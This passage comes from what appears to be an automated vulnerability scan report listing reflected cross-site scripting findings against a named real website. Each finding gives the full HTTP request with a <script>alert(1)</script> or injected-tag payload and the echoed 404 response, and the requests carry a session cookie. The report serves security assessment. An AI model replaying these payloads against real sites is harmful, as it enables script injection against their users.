X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=24fe7d<a>06dd9bbdfa8 was not found on this server.</p>
...[SNIP]...

2.5094. http://www.resellerbase.com/web-service/domain-names/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b1307<script>alert(1)</script>55abc4629f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceb1307<script>alert(1)</script>55abc4629f5/domain-names/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceb1307<script>alert(1)</script>55abc4629f5/domain-names/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5095. http://www.resellerbase.com/web-service/domain-names/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7900c<script>alert(1)</script>2036380b5d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names7900c<script>alert(1)</script>2036380b5d2/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names7900c<script>alert(1)</script>2036380b5d2/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5096. http://www.resellerbase.com/web-service/domain-names/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b9829<script>alert(1)</script>1d930b4b6bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themesb9829<script>alert(1)</script>1d930b4b6bb/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themesb9829<script>alert(1)</script>1d930b4b6bb/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5097. http://www.resellerbase.com/web-service/domain-names/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f1041<script>alert(1)</script>999f6d2a307 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/search.phpf1041<script>alert(1)</script>999f6d2a307?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/search.phpf1041<script>alert(1)</script>999f6d2a307?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5098. http://www.resellerbase.com/web-service/domain-names/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload c77ae<a>a4e40f29a49 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/search.php?keyword=search...&Submit3=Searchc77ae<a>a4e40f29a49&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/search.php?keyword=search...&Submit3=Searchc77ae<a>a4e40f29a49&opt=2 was not found on this server.</p>
...[SNIP]...

2.5099. http://www.resellerbase.com/web-service/domain-names/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 3877f<a>146dff65a7f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/search.php?keyword=search...3877f<a>146dff65a7f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/search.php?keyword=search...3877f<a>146dff65a7f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5100. http://www.resellerbase.com/web-service/domain-names/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 62562<script>alert(1)</script>5329d723f9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/search.php?keyword=search...&Submit3=Search&opt=2&62562<script>alert(1)</script>5329d723f9c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/search.php?keyword=search...&Submit3=Search&opt=2&62562<script>alert(1)</script>5329d723f9c=1 was not found on this server.</p>
...[SNIP]...

2.5101. http://www.resellerbase.com/web-service/domain-names/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5e434<a>41220101433 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/search.php?keyword=search...&Submit3=Search&opt=25e434<a>41220101433 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/search.php?keyword=search...&Submit3=Search&opt=25e434<a>41220101433 was not found on this server.</p>
...[SNIP]...

2.5102. http://www.resellerbase.com/web-service/googlepr.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload acff1<script>alert(1)</script>38ea1355f3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceacff1<script>alert(1)</script>38ea1355f3c/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceacff1<script>alert(1)</script>38ea1355f3c/googlepr.php was not found on this server.</p>
...[SNIP]...

2.5103. http://www.resellerbase.com/web-service/googlepr.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1c51f<script>alert(1)</script>1b7d7695c41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/googlepr.php1c51f<script>alert(1)</script>1b7d7695c41 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/googlepr.php1c51f<script>alert(1)</script>1b7d7695c41 was not found on this server.</p>
...[SNIP]...

2.5104. http://www.resellerbase.com/web-service/googlepr.php [link_id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload 57c1c<a>620fe4ba2c8 was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/googlepr.php?link_id=757c1c<a>620fe4ba2c8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/googlepr.php?link_id=757c1c<a>620fe4ba2c8 was not found on this server.</p>
...[SNIP]...

2.5105. http://www.resellerbase.com/web-service/googlepr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3dd4d<script>alert(1)</script>e642e9a5827 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/googlepr.php?3dd4d<script>alert(1)</script>e642e9a5827=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/googlepr.php?3dd4d<script>alert(1)</script>e642e9a5827=1 was not found on this server.</p>
...[SNIP]...

2.5106. http://www.resellerbase.com/web-service/more2.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/more2.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 363ec<script>alert(1)</script>db5623a2a72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service363ec<script>alert(1)</script>db5623a2a72/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service363ec<script>alert(1)</script>db5623a2a72/more2.html was not found on this server.</p>
...[SNIP]...

2.5107. http://www.resellerbase.com/web-service/more2.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/more2.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9740f<script>alert(1)</script>5192287fd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/9740f<script>alert(1)</script>5192287fd0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/9740f<script>alert(1)</script>5192287fd0 was not found on this server.</p>
...[SNIP]...

2.5108. http://www.resellerbase.com/web-service/other/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 54406<script>alert(1)</script>0f43fd0f75d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service54406<script>alert(1)</script>0f43fd0f75d/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service54406<script>alert(1)</script>0f43fd0f75d/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f was not found on this server.</p>
...[SNIP]...

2.5109. http://www.resellerbase.com/web-service/other/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e03a5<script>alert(1)</script>43f11b2da0a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/othere03a5<script>alert(1)</script>43f11b2da0a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/othere03a5<script>alert(1)</script>43f11b2da0a/ was not found on this server.</p>
...[SNIP]...

2.5110. http://www.resellerbase.com/web-service/other/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 53007<script>alert(1)</script>919fc1c96dd570a93 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/other53007<script>alert(1)</script>919fc1c96dd570a93/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other53007<script>alert(1)</script>919fc1c96dd570a93/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.5111. http://www.resellerbase.com/web-service/other/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 13ade<script>alert(1)</script>cb81be513ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/?13ade<script>alert(1)</script>cb81be513ea=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/?13ade<script>alert(1)</script>cb81be513ea=1 was not found on this server.</p>
...[SNIP]...

2.5112. http://www.resellerbase.com/web-service/other/ [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload 42a81<a>a61c54a0b66 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f42a81<a>a61c54a0b66 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/
